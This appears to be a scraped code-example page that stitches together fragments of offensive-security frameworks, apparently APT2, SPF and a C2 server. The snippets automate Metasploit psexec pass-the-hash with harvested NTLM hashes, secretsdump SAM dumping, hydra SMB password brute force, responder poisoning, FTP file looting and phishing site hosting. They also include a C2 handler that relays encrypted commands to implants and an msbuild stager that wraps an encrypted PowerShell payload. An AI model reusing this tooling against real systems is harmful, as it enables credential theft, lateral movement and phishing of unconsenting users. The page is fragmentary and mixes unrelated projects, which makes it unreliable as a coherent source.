        # TODO
        # check to see if we got any creds 
        # if not, wait 5 minutes and run again for 15 minutes

        # repeat upto 5 4 times
        return
示例#36
0
 def __init__(self, data, req):
   self.data = data
   self.utils = Utils()
   self.netutils = Network()
   self.metadata = {
     'unique_id' : self.utils.generate_uuid(),
     'timestamp' : self.utils.get_datetime(),
     'node': gethostname(),
     'issuer':{
       'user_agent':req.headers.get('User-Agent'),
       'source_ip':req.remote_addr
       }
     }
   self.data['metadata'] = self.metadata
示例#37
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                users = kb.get("host/" + t + "/user")
                for user in users:
                    hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash")
                    for passhash in hashes:
                        # verify we have not tested this host before
                        if not self.seentarget(t+user+passhash):
                            # add the new IP to the already seen list
                            self.addseentarget(t+user+passhash)
                            self.display.verbose(self.shortName + " - Connecting to " + t)
                            msf.execute("use exploit/windows/smb/psexec\n")
                            # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
                            # msf.execute("set LHOST %s\n" % self.config['lhost'])
                            # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
                            # msf.execute("set LPORT 4444\n")
                            msf.execute("set RPORT 445\n")
                            msf.execute("set RHOST " + t + "\n")
                            msf.execute("set SMBUser " + user + "\n")
                            msf.execute("set SMBPass " + passhash + "\n")
                            msf.execute("exploit -j\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
        
                            outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                            result = msf.getResult()
                            Utils.writeFile(result, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        
                            parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                            for part in parts:
                                self.fire("msfSession")
                                self.display.verbose("NEW session on : " + t)
                                kb.add("host/" + t + "/msfSession/" + str(part))
        
            # clean up after ourselves
            result = msf.cleanup()

        return
示例#38
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            users = kb.get(['host/' + t + '/user'])
            self.display.verbose(self.shortName + " - Connecting to " + t)
            for user in users:
                # verify we have not tested this host before
                if not self.seentarget(t + str(user)):
                    # add the new IP to the already seen list
                    self.addseentarget(t + str(user))

                    passwords = kb.get(
                        ['host/' + t + '/user/' + user + '/password'])
                    for password in passwords:
                        self.display.verbose(self.shortName +
                                             " - Connecting to " + t)

                        # make outfile
                        temp_file = self.config[
                            "proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr(
                                10)

                        # run secretesdump.py
                        command = self.config["secretsdump.py"] + " -outputfile " + temp_file + " \"" + user + "\":\"" + password + \
                                  "\"@" + t
                        result = Utils.execWait(command, None)

                        if Utils.isReadable(temp_file + '.sam'):
                            with open(temp_file + '.sam', "r") as myfile:
                                result = myfile.readlines()

                            for line in result:
                                m = line.split(':')
                                user = m[0].strip()
                                uid = m[1].strip()
                                lmhash = m[2].strip()
                                ntlmhash = m[3].strip()

                                kb.add("host/" + t + "/user/" + user +
                                       "/lmhash/" + lmhash)
                                kb.add("host/" + t + "/user/" + user +
                                       "/ntlmhash/" + ntlmhash)
                                kb.add("host/" + t + "/user/" + user +
                                       "/fullhash/" + lmhash + ":" + ntlmhash)
                                self.fire("newNTLMHash")
        return
示例#39
0
    def view_event(self, data):
        log_path = Utils.get_arg_at(data, 1, 2)
        if log_path == "":
            UI.error("Missing arguments")
            return

        if log_path == "key":
            UI.warn("Your encryption key is '%s'" %
                    self.config.get("encryption-key"))
            return

        if log_path == "password":
            UI.warn("Your server password is '%s'" %
                    self.config.get("server-password"))
            return

        if not log_path in ("http", "event", "error"):
            UI.error("Invalid path")
            return

        log_path += ".log"

        rows = Utils.get_arg_at(data, 2, 2)
        if rows == "":
            rows = 10
        else:
            try:
                rows = int(rows)
            except:
                rows = 10

        log_path = Log.get_current_path(log_path)

        data = []

        if Utils.file_exists(log_path):
            for line in open(log_path, "rb").readlines():
                data.append(line)

            data = list(reversed(data))

            print("\nLast %d lines of log\n----------------------\n" % rows)
            data = list(data)

            for i in range(0, rows):
                try:
                    print data[i]
                except:
                    pass
示例#40
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/snmp/snmp_login\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("set VERSION 2c\n")
                    msf.execute("run\n")
                    msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*LOGIN SUCCESSFUL.*", result)
                    for part in parts:
                        callFire = True
                        # Add all relevant details
                        p = part.split()
                        comString = p[p.index("SUCCESSFUL:") + 1]
                        self.addVuln(t, "snmpCred", {"port": "161", "message": str(part), "communityString": comString,
                                                     "output": outfile.replace("/", "%2F")})

            if callFire:
                self.fire("snmpCred")

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#41
0
 def get_autocommands(self, guid):
     profile = self.config.get("profile")
     commands = profile.get("autocommands")
     if isinstance(commands, list):
         shell = self.db.get_prompt(guid).decode().split(" ")[1]
         UI.success("Running auto commands on shell %s" % shell)
         Log.log_event("Running auto commands on shell", shell)
         for command in commands:
             print("\t[+] %s" % command)
             Log.log_shell(guid, "Sending", command)
             self.db.append_shell_data(
                 guid, "[%s] AutoCommand Sending: \n%s\n\n" %
                 (Utils.timestamp(), command))
             self.db.push_cmd(guid, command, Utils.guid(),
                              self.config.get("username"))
示例#42
0
文件: responder.py 项目: xxoxx/apt2
    def process(self):
        temp_file = self.config[
            "proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)

        command = "responder -I eth0 -wrf"
        # run for 15 minutes
        # result = Utils.execWait(command, temp_file, timeout=900)
        result = Utils.execWait(command, temp_file, timeout=60)

        # TODO
        # check to see if we got any creds
        # if not, wait 5 minutes and run again for 15 minutes

        # repeat upto 5 4 times
        return
示例#43
0
class YtSite(object):
    def __init__(self, driver, logger, url):
        self.driver = driver
        self.logger = logger
        self.url = url
        self.utils = Utils(self.driver, self.logger)

    def run(self):
        # 测试网站模块
        self.utils.get_item_and_click('//li[9]/a')
        self.driver.implicitly_wait(3)
        self.utils.get_item_and_click('//tr[1]//a[2]')
        self.utils.insert_to_all_text()
        self.utils.select_all_item(1)
        self.utils.get_item_and_click('//button[1]')
示例#44
0
        def do_POST(self):
            if self.path.split('/')[1] == 'api':
                server_api = ServerApi(self.config, self)
                self.output = server_api.process()
                self.return_json()
                return

            length = 0
            if not self.headers.getheader('Content-Length') == None:
                length = int(self.headers.getheader('Content-Length'))

            data = self.rfile.read(length)
            try:
                data = json.loads(data)
                data['Data'] = self.rc4.crypt(base64.b64decode(data['Data']))
            except:
                Log.log_error('Invalid base64 data received or bad decryption', self.path)
                self.return_data()
                return

            guid = ''
            try:
                guid = Utils.validate_guid(data['ID'])
            except:
                Log.log_error('Invalid request no GUID', self.path)
                self.return_data()
                return

            if not guid == None:
                self.db.update_checkin(guid, str(self.client_address[0]))

                parser = HTTPDParser(config)
                output = parser.parse_cmd(guid, data['Data'],
                        data['UUID'])
                if not output == None:
                    uuid = output[:36]
                    output = output[37:]
                    self.output = \
                        base64.b64encode(self.rc4.crypt(output))
                    self.output = json.dumps({'UUID': uuid, 'ID': guid, 'Data': self.output})
                else:
                    self.output = json.dumps({'UUID': None, 'ID': guid,'Data': Utils.gen_str(random.randrange(10,1000))})
                self.return_json()
                return
            else:
                self.output = Utils.load_file('html/%s' % self.config.get('http-default-404'))

            self.return_data()
示例#45
0
        def do_POST(self):
            if self.path.split("/")[1] == "api":
                server_api = ServerApi(self.config, self)
                self.output = server_api.process()
                self.return_json()
                return

            length = 0
            if not self.headers.get("Content-Length") == None:
                length = int(self.headers.get("Content-Length"))

            data = self.rfile.read(length)
            try:
                data = json.loads(data)
                data["Data"] = self.rc4.dcrypt(base64.b64decode(data["Data"]))
            except Exception as e:
                print("%s, %s" % (sys.exc_info()[1],sys.exc_info()[2]))
                Log.log_error("Invalid base64 data received or bad decryption", self.path)
                self.return_data()
                return

            guid = ""
            try:
                guid = Utils.validate_guid(data["ID"])
            except Exception as e:
                print("%s, %s" % (sys.exc_info()[1],sys.exc_info()[2]))
                Log.log_error("Invalid request no GUID", self.path)
                self.return_data()
                return

            if not guid == None:
                self.db.update_checkin(guid, str(self.client_address[0]))

                parser = HTTPDParser(config)
                output = parser.parse_cmd(guid, data["Data"], data["UUID"])
                if not output == None:
                    uuid = output[:36]
                    output = output[37:]
                    self.output = base64.b64encode(self.rc4.crypt(output)).decode()
                    self.output = json.dumps({"UUID": uuid, "ID": guid, "Data": self.output})
                else:
                    self.output = json.dumps({"UUID": None, "ID": guid,"Data": Utils.gen_str(random.randrange(10,1000))})
                self.return_json()
                return
            else:
                self.output = Utils.load_file("html/%s" % self.config.get("http-default-404"))

            self.return_data()
示例#46
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString")
                    for comString in comStrings:
                        myMsf.lock.acquire()
                        msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("exploit\n")
                        msf.sleep(int(self.config['msfexploitdelay']))
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is None):
                            result = result + msf.getResult()
                        myMsf.lock.release()

                        outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                        #  Don't need to parse out IP, we are running module one IP at a time
                        # Just find lines with  -  and pull out share name
                        parts = re.findall(".* - .*", result)
                        for part in parts:
                            sharename = (part.split('-')[0]).strip()
                            kb.add("share/smb/" + t + "/" + sharename)

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#47
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    myMsf.lock.acquire()
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/x11/open_x11\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("exploit\n")
                    msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()
                    myMsf.lock.release()

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*Open X Server.*", result)
                    for part in parts:
                        callFire = True
                        self.addVuln(t, "openX11",
                                     {"port": "6000", "message": str(part), "output": outfile.replace("/", "%2F")})

            # Nothing to trigger?
            if callFire:
                self.fire("x11Access")

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#48
0
 def generate_msbuild(self, ps):
     msbuild = Utils.load_powershell_script("../bin/stager.csproj", 999)
     rc4_key = RC4.gen_rc4_key(32)
     hex_rc4_key = RC4.format_rc4_key(rc4_key)
     rc4 = RC4(rc4_key)
     data = base64.b64encode(rc4.crypt(ps))
     return msbuild.replace("[PAYLOAD]", data).replace("[KEY]", hex_rc4_key)
示例#49
0
    def searchTarget(self, target, port, username, password):
        success = False
        # start packet capture
        #        cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10,
        #                          srcip="", dstip=target)
        try:
            if (Utils.port_open(target, 21)):
                # attempt to connect to the remote host
                with ftputil.FTPHost(target, username, password) as host:
                    success = True
                    # get list of files and loop over them
                    recursive = host.walk("/", topdown=True, onerror=None)
                    for root, dirs, files in recursive:
                        for name in files:
                            for pattern in self.filepatterns:
                                match_list = fnmatch.filter(files, pattern)
                                for fname in match_list:
                                    fpath = host.path.join(root, fname)
                                    if host.path.isfile(fpath):
                                        host.download(
                                            fpath, self.config["proofsDir"] +
                                            ip + fpath.replace("/", "_"))
                    host.close()
        except ftputil.error.PermanentError:
            self.display.error("Could not connect to %s on port 21" % (target))

#        outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(port) + "_" + target + "_" + Utils.getRandStr(10)
#        Utils.writeFile(self.getPktCap(cap), outfile)
#        kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        return success
示例#50
0
文件: web.py 项目: firebitsbr/SPF
    def start(self):
        self.loadSites()

        if self.config["ip"] == "0.0.0.0":
            self.config["ip"]=Utils.getIP()

        #define phishing sites
        for key in self.websites:
            self.phishingsites[key] = PhishingSite(self.config, key, self.websites[key]['path'], self.logpath, "logs/" + self.websites[key]['logfile'], self.db, self.websites[key]['redirecturl']).getResource()

        site_length = 0
        for key in self.phishingsites:
            if (len(key) > site_length):
                site_length = len(key)

        # if we are doing port based
        print
        for key in self.phishingsites:
            for port in range(self.MINPORT, self.MAXPORT):
                try:
                    site = Site(self.phishingsites[key], logPath=self.logpath + "logs/" + self.websites[key]['logfile']+".access")
#                    site.logRequest = True
                    reactor.listenTCP(port, site)
                    print "Started website [%s] on [http://%s:%s]" % (('{:<%i}' % (site_length)).format(key), self.config["ip"], port)
                    self.websites[key]['port'] = port
                    break
                except twisted.internet.error.CannotListenError, ex:
                    continue
示例#51
0
文件: web.py 项目: firebitsbr/SPF
    def loadSites(self):

        templates = self.getTemplates()
        print

        # loop over each web template
        for f in templates:
            template_file = f + "/CONFIG"
            if Utils.is_readable(template_file) and os.path.isfile(template_file):
                print "Found the following web sites: [%s]" % template_file
                # read in the VHOST, LOGFILE, and REDIRECTURL
                VHOST = ""
                LOGFILE = ""
                REDIRECTURL = ""
                #PATH = self.config["web_template_path"] + f + "/"
                PATH = f + "/"
                with open (template_file, "r") as myfile:
                    for line in myfile.readlines():
                        match=re.search("VHOST=", line)
                        if match:
                            VHOST=line.replace('"', "")
                            VHOST=VHOST.split("=")
                            VHOST=VHOST[1].lower().strip()
                        match2=re.search("LOGFILE=", line)
                        if match2:
                            LOGFILE=line.replace('"', "")
                            LOGFILE=LOGFILE.split("=")
                            LOGFILE=LOGFILE[1].strip()
                        match3=re.search("REDIRECTURL=", line)
                        if match3:
                            REDIRECTURL=line.replace('"', "")
                            REDIRECTURL=REDIRECTURL.replace(r'\n', "\n")
                            REDIRECTURL=REDIRECTURL.split("=")
                            REDIRECTURL=REDIRECTURL[1].strip()
                self.websites[VHOST] = {'path':PATH, 'port':8000, 'logfile':LOGFILE, 'redirecturl':REDIRECTURL}
示例#52
0
 def flushdb(self, data):
     force = Utils.get_arg_at(data, 1, 1)
     if force:
         self.db.flushdb()
         UI.error("The whole redis DB was flushed")
     else:
         UI.error("Please use the force switch")
示例#53
0
文件: web.py 项目: vmlinuxer/SPF
    def loadSites(self):

        templates = self.getTemplates()
        print

        # loop over each web template
        for f in templates:
            template_file = f + "/CONFIG"
            if Utils.is_readable(template_file) and os.path.isfile(template_file):
                print "Found the following web sites: [%s]" % template_file
                # read in the VHOST, LOGFILE, and REDIRECTURL
                VHOST = ""
                LOGFILE = ""
                REDIRECTURL = ""
                #PATH = self.config["web_template_path"] + f + "/"
                PATH = f + "/"
                with open (template_file, "r") as myfile:
                    for line in myfile.readlines():
                        match=re.search("VHOST=", line)
                        if match:
                            VHOST=line.replace('"', "")
                            VHOST=VHOST.split("=")
                            VHOST=VHOST[1].lower().strip()
                        match2=re.search("LOGFILE=", line)
                        if match2:
                            LOGFILE=line.replace('"', "")
                            LOGFILE=LOGFILE.split("=")
                            LOGFILE=LOGFILE[1].strip()
                        match3=re.search("REDIRECTURL=", line)
                        if match3:
                            REDIRECTURL=line.replace('"', "")
                            REDIRECTURL=REDIRECTURL.replace(r'\n', "\n")
                            REDIRECTURL=REDIRECTURL.split("=")
                            REDIRECTURL=REDIRECTURL[1].strip()
                self.websites[VHOST] = {'path':PATH, 'port':8000, 'logfile':LOGFILE, 'redirecturl':REDIRECTURL}
示例#54
0
    def start(self):
        self.loadSites()

        if self.config["ip"] == "0.0.0.0":
            self.config["ip"] = Utils.getIP()

        #define phishing sites
        for key in self.websites:
            self.phishingsites[key] = PhishingSite(
                self.config, key, self.websites[key]['path'], self.logpath,
                "logs/" + self.websites[key]['logfile'], self.db,
                self.websites[key]['redirecturl']).getResource()

        site_length = 0
        for key in self.phishingsites:
            if (len(key) > site_length):
                site_length = len(key)

        # if we are doing port based
        print
        for key in self.phishingsites:
            for port in range(self.MINPORT, self.MAXPORT):
                try:
                    site = Site(self.phishingsites[key],
                                logPath=self.logpath + "logs/" +
                                self.websites[key]['logfile'] + ".access")
                    #                    site.logRequest = True
                    reactor.listenTCP(port, site)
                    print "Started website [%s] on [http://%s:%s]" % (
                        ('{:<%i}' %
                         (site_length)).format(key), self.config["ip"], port)
                    self.websites[key]['port'] = port
                    break
                except twisted.internet.error.CannotListenError, ex:
                    continue
示例#55
0
文件: web.py 项目: Sh3llSh0ck3d/SPF
    def start(self):
        self.loadSites()

        ip = Utils.getIP()

        #define phishing sites
        for key in self.websites:
            self.phishingsites[key] = PhishingSite(self.config, key, self.websites[key]['path'], self.logpath, self.websites[key]['logfile'], self.websites[key]['redirecturl']).getResource()

        site_length = 0
        for key in self.phishingsites:
            if (len(key) > site_length):
                site_length = len(key)

        # if we are doing port based
        print
        for key in self.phishingsites:
            for port in range(self.MINPORT, self.MAXPORT):
                try:
                    reactor.listenTCP(port,  Site(self.phishingsites[key]))
                    print "Started website [%s] on [http://%s:%s]" % (('{:<%i}' % (site_length)).format(key), ip, port)
                    self.websites[key]['port'] = port
                    break
                except twisted.internet.error.CannotListenError, ex:
                    continue
示例#56
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            users = self.getUsers(t)
            self.display.verbose(self.shortName + " - Connecting to " + t)
            for user in users:
                # verify we have not tested this host before
                if not self.seentarget(t + str(user)):
                    # add the new IP to the already seen list
                    self.addseentarget(t + str(user))
                    # make outfile
                    temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)

                    command = self.config["hydra"] + " -s 445 -l " + user + " -P " + self.config[
                        "miscDir"] + "passwords.txt smb://" + t
                    result = Utils.execWait(command, temp_file, timeout=30)

                    # Extract usernames & passwords from results and add to KB
                    parts = re.findall(".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result)
                    for part in parts:
                        self.fire("newSmbPassword")
                        self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")})

                        self.display.debug(
                            "Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t)
                        kb.add("creds/host/" + t + "/username/" + part[0].strip() + "/password/" + part[1].strip())

        return
示例#57
0
文件: anonldap.py 项目: HMSH00D/apt2
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        callFire = False
        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                self.display.verbose(self.shortName + " - Connecting to " + t)
                # add the new IP to the already seen list
                self.addseentarget(t)
                # make outfile
                outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)

                # run rpcclient
                command = "ldapsearch -h " + t + " -p 389 -x -s base"
                result = Utils.execWait(command, outfile)

                # TODO - Parse output and do stuff
                parts = re.findall("ref: .*", result)
                for part in parts:
                    callFire = True
                    self.addVuln(t, "AnonymousLDAP", {"port": "389", "message": str(part).replace("/", "%2F"), "output": outfile.replace("/", "%2F")})
        if callFire:
                self.fire("anonymousLDAP")

        return